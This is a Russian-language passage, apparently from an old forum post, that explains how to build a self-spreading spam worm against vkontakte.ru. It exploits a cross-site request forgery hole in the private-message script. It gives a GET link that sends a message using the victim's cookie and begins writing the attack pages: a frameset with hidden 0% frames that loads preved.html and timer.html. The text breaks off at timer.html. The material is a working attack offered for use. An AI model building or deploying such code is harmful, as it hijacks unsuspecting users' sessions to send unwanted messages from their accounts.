В связи с тем, что изначально формы отправки сообщений и
комментариев были ничем не защищены, то был получен довольно забавный
опыт саморассылающегося спама. Это и по сей день остаётся актуальным,
ибо часть скриптов по-прежнему не защищена.
Итак, рассмотрим, к
примеру, скрипт отправки личных сообщений. Вообще, изначально
пользователи взаимодействуют с ним посредством метода POST, но в самом скрипте метод не проверяется (то ли используется суперглобальный массив $_REQUEST, то ли register_globals=on).
Примечание: метод не имеет значения, просто метод GET несколько упрощает скрипт, о методе POST будет сказано ниже.
Чтобы отправить сообщение достаточно перейти по ссылке: http://vkontakte.ru/mail.php?act=sent&to_id=1&title=&message=Hello.
Сообщение
будет отправленно в случае наличия куки. Собстсвенно, в этом и состоит
идея - написать скрипт, который будет открывать эту ссылку в скрытом
фрейме, рассылая наши сообщения.
Создадим три страницы:
1) index.html
Код HTML:
<frameset
ROWS="100%,0%,0%"> <FRAME NAME="mainfrm"
src="http://www.183.ru/2/"> <FRAME NAME="preved"
src="preved.html"> <FRAME NAME="timer" src="timer.html">
</frameset>
2) preved.html
Код HTML:
<html><head></head><body></body></html>
3) timer.html...
